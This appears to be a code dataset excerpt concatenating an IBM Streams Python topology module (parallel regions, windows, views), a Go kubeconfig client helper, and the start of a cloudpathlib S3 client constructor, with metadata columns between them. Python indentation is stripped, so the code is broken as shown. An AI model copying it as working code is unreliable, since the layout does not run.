if routing is None or routing == Routing.ROUND_ROBIN or routing == Routing.BROADCAST:
op2 = self.topology.graph.addOperator("$Parallel$", name=_name)
if name is not None:
op2.config['regionName'] = _name
op2.addInputPort(outputPort=self.oport)
if routing == Routing.BROADCAST:
oport = op2.addOutputPort(width, schema=self.oport.schema, routing="BROADCAST", name=_name)
else:
oport = op2.addOutputPort(width, schema=self.oport.schema, routing="ROUND_ROBIN", name=_name)
return Stream(self.topology, oport, other=self)
elif routing == Routing.HASH_PARTITIONED:
if (func is None):
if self.oport.schema == streamsx.topology.schema.CommonSchema.String:
keys = ['string']
parallel_input = self.oport
elif self.oport.schema == streamsx.topology.schema.CommonSchema.Python:
func = hash
else:
raise NotImplementedError("HASH_PARTITIONED for schema {0} requires a hash function.".format(self.oport.schema))
if func is not None:
keys = ['__spl_hash']
stateful = _determine_statefulness(func)
hash_adder = self.topology.graph.addOperator(self.topology.opnamespace+"::HashAdder", func, stateful=stateful)
hash_adder._op_def['hashAdder'] = True
hash_adder._layout(hidden=True)
hash_schema = self.oport.schema.extend(streamsx.topology.schema.StreamSchema("tuple<int64 __spl_hash>"))
hash_adder.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, hash_adder, 'pyStyle')
parallel_input = hash_adder.addOutputPort(schema=hash_schema)
parallel_op = self.topology.graph.addOperator("$Parallel$", name=_name)
if name is not None:
parallel_op.config['regionName'] = _name
parallel_op.addInputPort(outputPort=parallel_input)
parallel_op_port = parallel_op.addOutputPort(oWidth=width, schema=parallel_input.schema, partitioned_keys=keys, routing="HASH_PARTITIONED")
if func is not None:
# use the Functor passthru operator to remove the hash attribute by removing it from output port schema
hrop = self.topology.graph.addPassThruOperator()
hrop._layout(hidden=True)
hrop.addInputPort(outputPort=parallel_op_port)
parallel_op_port = hrop.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, parallel_op_port, other=self)
else :
raise TypeError("Invalid routing type supplied to the parallel operator")
def end_parallel(self):
"""
Ends a parallel region by merging the channels into a single stream.
Returns:
Stream: Stream for which subsequent transformations are no longer parallelized.
.. seealso:: :py:meth:`set_parallel`, :py:meth:`parallel`
"""
outport = self.oport
if isinstance(self.oport.operator, streamsx.topology.graph.Marker):
if self.oport.operator.kind == "$Union$":
pto = self.topology.graph.addPassThruOperator()
pto.addInputPort(outputPort=self.oport)
outport = pto.addOutputPort(schema=self.oport.schema)
op = self.topology.graph.addOperator("$EndParallel$")
op.addInputPort(outputPort=outport)
oport = op.addOutputPort(schema=self.oport.schema)
endP = Stream(self.topology, oport, other=self)
return endP
def set_parallel(self, width, name=None):
"""
Set this source stream to be split into multiple channels
as the start of a parallel region.
Calling ``set_parallel`` on a stream created by
:py:meth:`~Topology.source` results in the stream
having `width` channels, each created by its own instance
of the callable::
s = topo.source(S())
s.set_parallel(3)
f = s.filter(F())
e = f.end_parallel()
Each channel has independent instances of ``S`` and ``F``. Tuples
created by the instance of ``S`` in channel 0 are passed to the
instance of ``F`` in channel 0, and so on for channels 1 and 2.
Callable transforms instances within the channel can use
the runtime functions
:py:func:`~streamsx.ec.channel`,
:py:func:`~streamsx.ec.local_channel`,
:py:func:`~streamsx.ec.max_channels` &
:py:func:`~streamsx.ec.local_max_channels`
to adapt to being invoked in parallel. For example a
source callable can use its channel number to determine
which partition to read from in a partitioned external system.
Calling ``set_parallel`` on a stream created by
:py:meth:`~Topology.subscribe` results in the stream
having `width` channels. Subscribe ensures that the
stream will contain all published tuples matching the
topic subscription and type. A published tuple will appear
on one of the channels though the specific channel is not known
in advance.
A parallel region is terminated by :py:meth:`end_parallel`
or :py:meth:`for_each`.
The number of channels is set by `width` which may be an `int` greater
than zero or a submission parameter created by
:py:meth:`Topology.create_submission_parameter`.
With IBM Streams 4.3 or later the number of channels can be
dynamically changed at runtime.
Parallel regions are started on non-source streams using
:py:meth:`parallel`.
Args:
width: The degree of parallelism for the parallel region.
name(str): Name of the parallel region. Defaults to the name of this stream.
Returns:
Stream: Returns this stream.
.. seealso:: :py:meth:`parallel`, :py:meth:`end_parallel`
.. versionadded:: 1.9
.. versionchanged:: 1.11 `name` parameter added.
"""
self.oport.operator.config['parallel'] = True
self.oport.operator.config['width'] = streamsx.topology.graph._as_spl_json(width, int)
if name:
name = self.topology.graph._requested_name(str(name), action='set_parallel')
self.oport.operator.config['regionName'] = name
return self
def set_consistent(self, consistent_config):
""" Indicates that the stream is the start of a consistent region.
Args:
consistent_config(consistent.ConsistentRegionConfig): the configuration of the consistent region.
Returns:
Stream: Returns this stream.
.. versionadded:: 1.11
"""
# add job control plane if needed
self.topology._add_job_control_plane()
self.oport.operator.consistent(consistent_config)
return self._make_placeable()
def last(self, size=1):
""" Declares a slding window containing most recent tuples
on this stream.
The number of tuples maintained in the window is defined by `size`.
If `size` is an `int` then it is the count of tuples in the window.
For example, with ``size=10`` the window always contains the
last (most recent) ten tuples.
If `size` is an `datetime.timedelta` then it is the duration
of the window. With a `timedelta` representing five minutes
then the window contains any tuples that arrived in the last
five minutes.
Args:
size: The size of the window, either an `int` to define the
number of tuples or `datetime.timedelta` to define the
duration of the window.
Examples::
# Create a window against stream s of the last 100 tuples
w = s.last(size=100)
::
# Create a window against stream s of tuples
# arrived on the stream in the last five minutes
w = s.last(size=datetime.timedelta(minutes=5))
Returns:
Window: Window of the last (most recent) tuples on this stream.
"""
win = Window(self, 'SLIDING')
if isinstance(size, datetime.timedelta):
win._evict_time(size)
elif isinstance(size, int):
win._evict_count(size)
else:
raise ValueError(size)
return win
def batch(self, size):
""" Declares a tumbling window to support batch processing
against this stream.
The number of tuples in the batch is defined by `size`.
If `size` is an ``int`` then it is the count of tuples in the batch.
For example, with ``size=10`` each batch will nominally
contain ten tuples. Thus processing against the returned
:py:class:`Window`, such as :py:meth:`~Window.aggregate` will be
executed every ten tuples against the last ten tuples on the stream.
For example the first three aggregations would be against
the first ten tuples on the stream, then the next ten tuples
and then the third ten tuples, etc.
If `size` is an `datetime.timedelta` then it is the duration
of the batch using wallclock time.
With a `timedelta` representing five minutes
then the window contains any tuples that arrived in the last
five minutes. Thus processing against the returned :py:class:`Window`,
such as :py:meth:`~Window.aggregate` will be executed every five minutes tuples
against the batch of tuples arriving in the last five minutes
on the stream. For example the first three aggregations would be
against any tuples on the stream in the first five minutes,
then the next five minutes and then minutes ten to fifteen.
A batch can contain no tuples if no tuples arrived on the stream
in the defined duration.
Each tuple on the stream appears only in a single batch.
The number of tuples seen by processing against the
returned window may be less than `size` (count or time based)
when:
* the stream is finite, the final batch may contain less tuples than the defined size,
* the stream is in a consistent region, drain processing will complete the current batch without waiting for it to batch to reach its nominal size.
Examples::
# Create batches against stream s of 100 tuples each
w = s.batch(size=100)
::
# Create batches against stream s every five minutes
w = s.batch(size=datetime.timedelta(minutes=5))
Args:
size: The size of each batch, either an `int` to define the
number of tuples or `datetime.timedelta` to define the
duration of the batch.
Returns:
Window: Window allowing batch processing on this stream.
.. versionadded:: 1.11
"""
win = Window(self, 'TUMBLING')
if isinstance(size, datetime.timedelta):
win._evict_time(size)
elif isinstance(size, int):
win._evict_count(size)
else:
raise ValueError(size)
return win
def union(self, streamSet):
"""
Creates a stream that is a union of this stream and other streams
Args:
streamSet: a set of Stream objects to merge with this stream
Returns:
Stream:
"""
if(not isinstance(streamSet,set)) :
raise TypeError("The union operator parameter must be a set object")
if(len(streamSet) == 0):
return self
op = self.topology.graph.addOperator("$Union$")
op.addInputPort(outputPort=self.oport)
for stream in streamSet:
op.addInputPort(outputPort=stream.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport)
def print(self, tag=None, name=None):
"""
Prints each tuple to stdout flushing after each tuple.
If `tag` is not `None` then each tuple has "tag: " prepended
to it before printing.
Args:
tag: A tag to prepend to each tuple.
name(str): Name of the resulting stream.
When `None` defaults to a generated name.
Returns:
streamsx.topology.topology.Sink: Stream termination.
.. versionadded:: 1.6.1 `tag`, `name` parameters.
.. versionchanged:: 1.7
Now returns a :py:class:`Sink` instance.
"""
_name = name
if _name is None:
_name = 'print'
fn = streamsx.topology.functions.print_flush
if tag is not None:
tag = str(tag) + ': '
fn = lambda v : streamsx.topology.functions.print_flush(tag + str(v))
sp = self.for_each(fn, name=_name)
sp._op().sl = _SourceLocation(_source_info(), 'print')
return sp
def publish(self, topic, schema=None, name=None):
"""
Publish this stream on a topic for other Streams applications to subscribe to.
A Streams application may publish a stream to allow other
Streams applications to subscribe to it. A subscriber
matches a publisher if the topic and schema match.
By default a stream is published using its schema.
A stream of :py:const:`Python objects <streamsx.topology.schema.CommonSchema.Python>` can be subscribed to by other Streams Python applications.
If a stream is published setting `schema` to
``json`` or :py:const:`~streamsx.topology.schema.CommonSchema.Json`
then it is published as a stream of JSON objects.
Other Streams applications may subscribe to it regardless
of their implementation language.
If a stream is published setting `schema` to
``str`` or :py:const:`~streamsx.topology.schema.CommonSchema.String`
then it is published as strings.
Other Streams applications may subscribe to it regardless
of their implementation language.
Supported values of `schema` are only
``json``, :py:const:`~streamsx.topology.schema.CommonSchema.Json`
and
``str``, :py:const:`~streamsx.topology.schema.CommonSchema.String`.
Args:
topic(str): Topic to publish this stream to.
schema: Schema to publish. Defaults to the schema of this stream.
name(str): Name of the publish operator, defaults to a generated name.
Returns:
streamsx.topology.topology.Sink: Stream termination.
.. versionadded:: 1.6.1 `name` parameter.
.. versionchanged:: 1.7
Now returns a :py:class:`Sink` instance.
"""
sl = _SourceLocation(_source_info(), 'publish')
_name = self.topology.graph._requested_name(name, action="publish")
schema = streamsx.topology.schema._normalize(schema)
group_id = None
if schema is not None and self.oport.schema.schema() != schema.schema():
nc = None
if schema == streamsx.topology.schema.CommonSchema.Json:
pub_stream = self.as_json()
elif schema == streamsx.topology.schema.CommonSchema.String:
pub_stream = self.as_string()
else:
raise ValueError(schema)
# See #https://github.com/IBMStreams/streamsx.topology.issues/2161
# group_id = pub_stream._op()._layout_group('Publish', name if name else _name)
if self._placeable:
self._colocate(pub_stream, 'publish')
else:
pub_stream = self
# publish is never stateful
op = self.topology.graph.addOperator("com.ibm.streamsx.topology.topic::Publish", params={'topic': topic}, sl=sl, name=_name, stateful=False)
op.addInputPort(outputPort=pub_stream.oport)
op._layout_group('Publish', name if name else _name, group_id=group_id)
sink = Sink(op)
if pub_stream._placeable:
pub_stream._colocate(sink, 'publish')
return sink
def autonomous(self):
"""
Starts an autonomous region for downstream processing.
By default IBM Streams processing is executed in an autonomous region
where any checkpointing of operator state is autonomous (independent)
of other operators.
This method may be used to end a consistent region by starting an
autonomous region. This may be called even if this stream is in
an autonomous region.
Autonomous is not applicable when a topology is submitted
to a STANDALONE contexts and will be ignored.
.. versionadded:: 1.6
Returns:
Stream: Stream whose subsequent downstream processing is in an autonomous region.
"""
op = self.topology.graph.addOperator("$Autonomous$")
op.addInputPort(outputPort=self.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport, other=self)
def as_string(self, name=None):
"""
Declares a stream converting each tuple on this stream
into a string using `str(tuple)`.
The stream is typed as a :py:const:`string stream <streamsx.topology.schema.CommonSchema.String>`.
If this stream is already typed as a string stream then it will
be returned (with no additional processing against it and `name`
is ignored).
Args:
name(str): Name of the resulting stream.
When `None` defaults to a generated name.
.. versionadded:: 1.6
.. versionadded:: 1.6.1 `name` parameter added.
Returns:
Stream: Stream containing the string representations of tuples on this stream.
"""
sas = self._change_schema(streamsx.topology.schema.CommonSchema.String, 'as_string', name)._layout('AsString')
sas.oport.operator.sl = _SourceLocation(_source_info(), 'as_string')
return sas._add_hints(streamsx._streams._hints.STR_HINTS)
def as_json(self, force_object=True, name=None):
"""
Declares a stream converting each tuple on this stream into
a JSON value.
The stream is typed as a :py:const:`JSON stream <streamsx.topology.schema.CommonSchema.Json>`.
Each tuple must be supported by `JSONEncoder`.
If `force_object` is `True` then each tuple that not a `dict`
will be converted to a JSON object with a single key `payload`
containing the tuple. Thus each object on the stream will
be a JSON object.
If `force_object` is `False` then each tuple is converted to
a JSON value directly using `json` package.
If this stream is already typed as a JSON stream then it will
be returned (with no additional processing against it and
`force_object` and `name` are ignored).
Args:
force_object(bool): Force conversion of non dicts to JSON objects.
name(str): Name of the resulting stream.
When `None` defaults to a generated name.
.. versionadded:: 1.6.1
Returns:
Stream: Stream containing the JSON representations of tuples on this stream.
"""
force_dict = False
if isinstance(self.oport.schema, streamsx.topology.schema.StreamSchema):
func = None
if self.oport.schema.style != dict:
force_dict = True
else:
func = streamsx.topology.runtime._json_force_object if force_object else None
saj = self._change_schema(streamsx.topology.schema.CommonSchema.Json, 'as_json', name, func)._layout('AsJson')
saj.oport.operator.sl = _SourceLocation(_source_info(), 'as_json')
if force_dict:
saj.oport.operator.params['pyStyle'] = 'dict'
return saj
def _change_schema(self, schema, action, name=None, func=None):
"""Internal method to change a schema.
"""
if self.oport.schema.schema() == schema.schema():
return self
if func is None:
func = streamsx.topology.functions.identity
_name = name
if _name is None:
_name = action
css = self._map(func, schema, name=_name)
if self._placeable:
self._colocate(css, action)
return css
def _make_placeable(self):
self._placeable = True
return self
def _layout(self, kind=None, hidden=None, name=None, orig_name=None):
self._op()._layout(kind, hidden, name, orig_name)
return self
class View(object):
"""
The View class provides access to a continuously updated sampling of data items on a :py:class:`Stream` after submission.
A view object is produced by :py:meth:`~Stream.view`, and will access data items from the stream on which it is invoked.
For example, a `View` object could be created and used as follows:
>>> topology = Topology()
>>> rands = topology.source(lambda: iter(random.random, None))
>>> view = rands.view()
>>> submit(ContextTypes.DISTRIBUTED, topology)
>>> queue = view.start_data_fetch()
>>> for val in iter(queue.get, None):
... print(val)
...
0.6527
0.1963
0.0512
"""
def __init__(self, name):
self.name = name
self._view_object = None
self._submit_context = None
def _initialize_rest(self):
"""Used to initialize the View object on first use.
"""
if self._submit_context is None:
raise ValueError("View has not been created.")
job = self._submit_context._job_access()
self._view_object = job.get_views(name=self.name)[0]
def stop_data_fetch(self):
"""Terminates the background thread fetching stream data items.
"""
if self._view_object:
self._view_object.stop_data_fetch()
self._view_object = None
def start_data_fetch(self):
"""Starts a background thread which begins accessing data from the remote Stream.
The data items are placed asynchronously in a queue, which is returned from this method.
Returns:
queue.Queue: A Queue object which is populated with the data items of the stream.
"""
self._initialize_rest()
return self._view_object.start_data_fetch()
def fetch_tuples(self, max_tuples=20, timeout=None):
"""
Fetch a number of tuples from this view.
Fetching of data must have been started with
:py:meth:`start_data_fetch` before calling this method.
If ``timeout`` is ``None`` then the returned list will
contain ``max_tuples`` tuples. Otherwise if the timeout is reached
the list may contain less than ``max_tuples`` tuples.
Args:
max_tuples(int): Maximum number of tuples to fetch.
timeout(float): Maximum time to wait for ``max_tuples`` tuples.
Returns:
list: List of fetched tuples.
.. versionadded:: 1.12
"""
return self._view_object.fetch_tuples(max_tuples, timeout)
def display(self, duration=None, period=2):
"""Display a view within a Jupyter or IPython notebook.
Provides an easy mechanism to visualize data on a stream
using a view.
Tuples are fetched from the view and displayed in a table
within the notebook cell using a ``pandas.DataFrame``.
The table is continually updated with the latest tuples from the view.
This method calls :py:meth:`start_data_fetch` and will call
:py:meth:`stop_data_fetch` when completed if `duration` is set.
Args:
duration(float): Number of seconds to fetch and display tuples. If ``None`` then the display will be updated until :py:meth:`stop_data_fetch` is called.
period(float): Maximum update period.
.. note::
A view is a sampling of data on a stream so tuples that
are on the stream may not appear in the view.
.. note::
Python modules `ipywidgets` and `pandas` must be installed
in the notebook environment.
.. warning::
Behavior when called outside a notebook is undefined.
.. versionadded:: 1.12
"""
self._initialize_rest()
return self._view_object.display(duration, period)
class PendingStream(object):
"""Pending stream connection.
A pending stream is an initially `disconnected` stream. The `stream` attribute
can be used as an input stream when the required stream is not yet available. Once the required
stream is available the connection is made using :py:meth:`complete`.
The schema of the pending stream is defined by the stream passed into `complete`.
A simple example is creating a source stream after the filter that will use it::
# Create the pending or placeholder stream
pending_source = PendingStream(topology)
# Create a filter against the placeholder stream
f = pending_source.stream.filter(lambda : t : t.startswith("H"))
source = topology.source(['Hello', 'World'])
# Now complete the connection
pending_source.complete(source)
Streams allows feedback loops in its flow graphs, where downstream processing can produce a stream that is
fed back into the input port of an upstream operator. Typically, feedback loops are
used to modify the state of upstream transformations, rather than repeat processing of tuples.
A feedback loop can be created by using a `PendingStream`. The upstream transformation or operator
that will end the feedback loop uses :py:attr:`~PendingStream.stream` as one of its inputs. A processing
pipeline is then created and once the downstream starting point of the feedback loop is available,
it is passed to :py:meth:`complete` to create the loop.
"""
def __init__(self, topology):
self.topology = topology
self._marker = topology.graph.addOperator(kind="$Pending$")
self._pending_schema = streamsx.topology.schema.StreamSchema(streamsx.topology.schema._SCHEMA_PENDING)
self.stream = Stream(topology, self._marker.addOutputPort(schema=self._pending_schema))
def complete(self, stream):
"""Complete the pending stream.
Any connections made to :py:attr:`stream` are connected to `stream` once
this method returns.
Args:
stream(Stream): Stream that completes the connection.
"""
assert not self.is_complete()
self._marker.addInputPort(outputPort=stream.oport)
self.stream.oport.schema = stream.oport.schema
# Update the pending schema to the actual schema
# Any downstream filters that took the reference
# will be automatically updated to the correct schema
self._pending_schema._set(self.stream.oport.schema)
# Mark the operator with the pending stream
# a start point for graph travesal
stream.oport.operator._start_op = True
def is_complete(self):
"""Has this connection been completed.
"""
return self._marker.inputPorts
class Window(object):
"""Declaration of a window of tuples on a `Stream`.
A `Window` enables transforms against collection (or window)
of tuples on a stream rather than per-tuple transforms.
Windows are created against a stream using :py:meth:`Stream.batch`
or :py:meth:`Stream.last`.
Supported transforms are:
* :py:meth:`aggregate` - Aggregate the window contents into a single tuple.
A window is optionally :py:meth:`partitioned <partition>` to create
independent sub-windows per partition key.
A `Window` can be also passed as the input of an SPL
operator invocation to indicate the operator's
input port is windowed.
Example invoking the SPL `Aggregate` operator with a sliding window of
the last two minutes, triggering every five tuples::
win = s.last(datetime.timedelta(minutes=2)).trigger(5)
agg = op.Map('spl.relational::Aggregate', win,
schema = 'tuple<uint64 sum, uint64 max>')
agg.sum = agg.output('Sum(val)')
agg.max = agg.output('Max(val)')
"""
def __init__(self, stream, window_type):
self.topology = stream.topology
self._hints = stream._hints
self.stream = stream
self._config = {'type': window_type}
def _copy(self):
wc = Window(self.stream, None)
wc._config.update(self._config)
return wc
def _evict_count(self, size):
self._config['evictPolicy'] = 'COUNT'
self._config['evictConfig'] = size
def _evict_time(self, duration):
self._config['evictPolicy'] = 'TIME'
self._config['evictConfig'] = int(duration.total_seconds() * 1000.0)
self._config['evictTimeUnit'] = 'MILLISECONDS'
def _partition_by_attribute(self, attribute):
# We cannot always get the list of tuple attributes here
# because it might be a named type. Validation of the attribute
# will be done in code generation. We only support partition
# by attribute for StreamSchema (not CommonSchema).
# Our input schema is the output schema of the previous operator.
if not isinstance(self.stream.oport.schema, streamsx.topology.schema.StreamSchema):
raise ValueError("Partition by attribute is supported only for a structured schema")
self._config['partitioned'] = True
self._config['partitionBy'] = attribute
def _partition_by_callable(self, function):
dilled_callable = None
stateful = _determine_statefulness(function)
# This is based on graph._addOperatorFunction.
if isinstance(function, types.LambdaType) and function.__name__ == "<lambda>" :
function = streamsx.topology.runtime._Callable1(function, no_context=True)
elif function.__module__ == '__main__':
# Function/Class defined in main, create a callable wrapping its
# dill'ed form
function = streamsx.topology.runtime._Callable1(function,
no_context = True if inspect.isroutine(function) else None)
if inspect.isroutine(function):
# callable is a function
name = function.__name__
else:
# callable is a callable class instance
name = function.__class__.__name__
# dill format is binary; base64 encode so it is json serializable
dilled_callable = base64.b64encode(dill.dumps(function, recurse=None)).decode("ascii")
self._config['partitioned'] = True
if dilled_callable is not None:
self._config['partitionByCallable'] = dilled_callable
self._config['partitionByName'] = name
self._config['partitionByModule'] = function.__module__
self._config['partitionIsStateful'] = bool(stateful)
def partition(self, key):
"""Declare a window with this window's eviction and trigger policies, and a partition.
In a partitioned window, a subwindow will be created for each distinct
value received for the attribute used for partitioning. Each subwindow
is treated as if it were a separate window, and each subwindow shares
the same trigger and eviction policy.
The key may either be a string containing the name of an attribute,
or a python callable.
The `key` parameter may be a string only with a structured schema,
and the value of the `key` parameter must be the name of a single
attribute in the schema.
The `key` parameter may be a python callable object. If it is, the
callable is evaluated for each tuple, and the return from the callable
determines the partition into which the tuple is placed. The return
value must have a ``__hash__`` method. If checkpointing is enabled,
and the callable object has a state, the state of the callable object
will be saved and restored in checkpoints. However, ``__enter__`` and
``__exit__`` methods may not be called on the callable object.
Args:
key: The name of the attribute to be used for partitioning, or
the python callable object used for partitioning.
Returns:
Window: Window that will be triggered.
.. versionadded:: 1.13
"""
pw = self._copy()
# Remove any existing partition. It will be replaced by the new
# partition
for k in {'partitioned','partitionBy','partitionByName','partitionByModule','partitionIsStateful'}:
pw._config.pop(k, None)
if callable(key):
pw._partition_by_callable(key)
else:
pw._partition_by_attribute(key)
return pw
def trigger(self, when=1):
"""Declare a window with this window's size and a trigger policy.
When the window is triggered is defined by `when`.
If `when` is an `int` then the window is triggered every
`when` tuples. For example, with ``when=5`` the window
will be triggered every five tuples.
If `when` is an `datetime.timedelta` then it is the period
of the trigger. With a `timedelta` representing one minute
then the window is triggered every minute.
By default, when `trigger` has not been called on a `Window`
it triggers for every tuple inserted into the window
(equivalent to ``when=1``).
Args:
when: The size of the window, either an `int` to define the
number of tuples or `datetime.timedelta` to define the
duration of the window.
Returns:
Window: Window that will be triggered.
.. warning:: A trigger is only supported for a sliding window
such as one created by :py:meth:`last`.
"""
tw = self._copy();
if isinstance(when, datetime.timedelta):
tw._config['triggerPolicy'] = 'TIME'
tw._config['triggerConfig'] = int(when.total_seconds() * 1000.0)
tw._config['triggerTimeUnit'] = 'MILLISECONDS'
elif isinstance(when, int):
tw._config['triggerPolicy'] = 'COUNT'
tw._config['triggerConfig'] = when
else:
raise ValueError(when)
return tw
def aggregate(self, function, name=None):
"""Aggregates the contents of the window when the window is
triggered.
Upon a window trigger, the supplied function is passed a list containing
the contents of the window: ``function(items)``. The order of the window
items in the list are the order in which they were each received by the
window. If the function's return value is not `None` then the result will
be submitted as a tuple on the returned stream. If the return value is
`None` then no tuple submission will occur.
For example, a window that calculates a moving average of the
last 10 tuples could be written as follows::
win = s.last(10).trigger(1)
moving_averages = win.aggregate(lambda tuples: sum(tuples)/len(tuples))
When the window is :py:meth:`partitioned <partition>`
then each partition is triggered and aggregated using
`function` independently.
For example, this partitioned window aggregation will independently
call ``summarize_sensors`` with ten tuples all having the same `id`
when triggered. Each partition triggers independently so that
``summarize_sensors`` is invoked for a specific `id` every time
two tuples with that `id` have been inserted into the window partition::
win = s.last(10).trigger(2).partition(key='id')
moving_averages = win.aggregate(summarize_sensors)
.. note:: If a tumbling (:py:meth:`~Stream.batch`) window's stream
is finite then a final aggregation is performed if the
window is not empty. Thus ``function`` may be passed fewer tuples
for a window sized using a count. For example a stream with 105
tuples and a batch size of 25 tuples will perform four aggregations
with 25 tuples each and a final aggregation of 5 tuples.
Args:
function: The function which aggregates the contents of the window
name(str): The name of the returned stream. Defaults to a generated name.
Returns:
Stream: A `Stream` of the returned values of the supplied function.
.. warning::
In Python 3.5 or later if the stream being aggregated has a
structured schema that contains a ``blob`` type then any ``blob``
value will not be maintained in the window. Instead its
``memoryview`` object will have been released. If the ``blob``
value is required then perform a :py:meth:`map` transformation
(without setting ``schema``) copying any required
blob value in the tuple using ``memoryview.tobytes()``.
.. versionadded:: 1.8
.. versionchanged:: 1.11 Support for aggregation of streams with structured schemas.
.. versionchanged:: 1.13 Support for partitioned aggregation.
"""
hints = streamsx._streams._hints.check_aggregate(function, self)
schema = hints.schema if hints else streamsx.topology.schema.CommonSchema.Python
sl = _SourceLocation(_source_info(), "aggregate")
_name = self.topology.graph._requested_name(name, action="aggregate", func=function)
stateful = _determine_statefulness(function)
params = {}
# if _config contains 'partitionBy', add a parameter 'pyPartitionBy'
if 'partitionBy' in self._config:
params['pyPartitionBy'] = self._config['partitionBy']
if 'partitionByCallable' in self._config:
params['pyPartitionByCallable'] = self._config['partitionByCallable']
if 'partitionByName' in self._config:
params['pyPartitionByName'] = self._config['partitionByName']
params['pyPartitionByModule'] = self._config['partitionByModule']
params['pyPartitionIsStateful'] = self._config['partitionIsStateful']
params['toolkitDir'] = streamsx.topology.param.toolkit_dir()
op = self.topology.graph.addOperator(self.topology.opnamespace+"::Aggregate", function, name=_name, sl=sl, stateful=stateful, params=params)
op.addInputPort(outputPort=self.stream.oport, window_config=self._config)
streamsx.topology.schema.StreamSchema._fnop_style(self.stream.oport.schema, op, 'pyStyle')
oport = op.addOutputPort(schema=schema, name=_name)
op._layout(kind='Aggregate', name=op.runtime_id, orig_name=name)
return Stream(self.topology, oport)._make_placeable()._add_hints(hints)
class Sink(_placement._Placement, object):
"""
Termination of a `Stream`.
A :py:class:`Stream` is terminated by processing that typically
sends the tuples to an external system.
.. note:: A `Stream` may have multiple terminations.
.. seealso:: :py:meth:`~Stream.for_each`, :py:meth:`~Stream.publish`, :py:meth:`~Stream.print`
.. versionadded:: 1.7
"""
def __init__(self, op):
self.__op = op
def _op(self):
return self.__op
| []
| []
| []
| [] | [] | python | 0 | 0 | |
pkg/cmd/util/client/client.go | package client
import (
"flag"
"fmt"
"os"
"path/filepath"
"strings"
"sync"
corebeta1 "github.com/openfunction/apis/core/v1beta1"
"k8s.io/cli-runtime/pkg/genericclioptions"
k8s "k8s.io/client-go/kubernetes"
scheme "k8s.io/client-go/kubernetes/scheme"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"k8s.io/client-go/util/homedir"
)
const (
kubeConfigDelimiter = ":"
)
// NewKubeConfigClient returns the kubeconfig and the client created from the kubeconfig.
func NewKubeConfigClient(cf *genericclioptions.ConfigFlags) (*rest.Config, *k8s.Clientset, error) {
config, err := cf.ToRESTConfig()
if err != nil {
return nil, nil, err
}
client, err := k8s.NewForConfig(config)
if err != nil {
return config, nil, err
}
return config, client, nil
}
func SetConfigDefaults(config *rest.Config) error {
gv := corebeta1.GroupVersion
config.GroupVersion = &gv
config.APIPath = "/apis"
config.NegotiatedSerializer = scheme.Codecs.WithoutConversion()
if config.UserAgent == "" {
config.UserAgent = rest.DefaultKubernetesUserAgent()
}
return nil
}
func getConfig() (*rest.Config, error) {
var (
doOnce sync.Once
kubeconfig *string
)
if home := homedir.HomeDir(); home != "" {
kubeconfig = flag.String("kubeconfig", filepath.Join(home, ".kube", "config"), "(optional) absolute path to the kubeconfig file")
} else {
kubeconfig = flag.String("kubeconfig", "", "absolute path to the kubeconfig file")
}
doOnce.Do(func() {
flag.Parse()
})
kubeConfigEnv := os.Getenv("KUBECONFIG")
delimiterBelongsToPath := strings.Count(*kubeconfig, kubeConfigDelimiter) == 1 && strings.EqualFold(*kubeconfig, kubeConfigEnv)
if len(kubeConfigEnv) != 0 && !delimiterBelongsToPath {
kubeConfigs := strings.Split(kubeConfigEnv, kubeConfigDelimiter)
if len(kubeConfigs) > 1 {
return nil, fmt.Errorf("multiple kubeconfigs in KUBECONFIG environment variable - %s", kubeConfigEnv)
}
kubeconfig = &kubeConfigs[0]
}
config, err := clientcmd.BuildConfigFromFlags("", *kubeconfig)
if err != nil {
return nil, err
}
return config, nil
}
| [
"\"KUBECONFIG\""
]
| []
| [
"KUBECONFIG"
]
| [] | ["KUBECONFIG"] | go | 1 | 0 | |
cloudpathlib/s3/s3client.py | import os
from pathlib import Path, PurePosixPath
from typing import Any, Dict, Iterable, Optional, Union
from ..client import Client, register_client_class
from ..cloudpath import implementation_registry
from .s3path import S3Path
try:
from boto3.session import Session
from boto3.s3.transfer import TransferConfig
from botocore.config import Config
from botocore.exceptions import ClientError
import botocore.session
except ModuleNotFoundError:
implementation_registry["s3"].dependencies_loaded = False
@register_client_class("s3")
class S3Client(Client):
"""Client class for AWS S3 which handles authentication with AWS for [`S3Path`](../s3path/)
instances. See documentation for the [`__init__` method][cloudpathlib.s3.s3client.S3Client.__init__]
for detailed authentication options."""
def __init__(
self,
aws_access_key_id: Optional[str] = None,
aws_secret_access_key: Optional[str] = None,
aws_session_token: Optional[str] = None,
no_sign_request: Optional[bool] = False,
botocore_session: Optional["botocore.session.Session"] = None,
profile_name: Optional[str] = None,
boto3_session: Optional["Session"] = None,
local_cache_dir: Optional[Union[str, os.PathLike]] = None,
endpoint_url: Optional[str] = None,
boto3_transfer_config: Optional["TransferConfig"] = None,
):
"""Class constructor. Sets up a boto3 [`Session`](
https://boto3.amazonaws.com/v1/documentation/api/latest/reference/core/session.html).
Directly supports the same authentication interface, as well as the same environment
variables supported by boto3. See [boto3 Session documentation](
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/session.html).
If no authentication arguments or environment variables are provided, then the client will
be instantiated as anonymous, which will only have access to public buckets.
Args:
aws_access_key_id (Optional[str]): AWS access key ID.
aws_secret_access_key (Optional[str]): AWS secret access key.
aws_session_token (Optional[str]): Session key for your AWS account. This is only
needed when you are using temporarycredentials.
no_sign_request: (Optional[bool]): If `True`, credentials are not looked for and we use unsigned
requests to fetch resources. This will only allow access to public resources. This is equivalent
to `--no-sign-request` in the AWS CLI (https://docs.aws.amazon.com/cli/latest/reference/).
botocore_session (Optional[botocore.session.Session]): An already instantiated botocore
Session.
profile_name (Optional[str]): Profile name of a profile in a shared credentials file.
boto3_session (Optional[Session]): An already instantiated boto3 Session.
local_cache_dir (Optional[Union[str, os.PathLike]]): Path to directory to use as cache
for downloaded files. If None, will use a temporary directory.
endpoint_url (Optional[str]): S3 server endpoint URL to use for the constructed boto3 S3 resource and client.
Parameterize it to access a customly deployed S3-compatible object store such as MinIO, Ceph or any other.
boto3_transfer_config (Optional[dict]): Instantiated TransferConfig for managing s3 transfers.
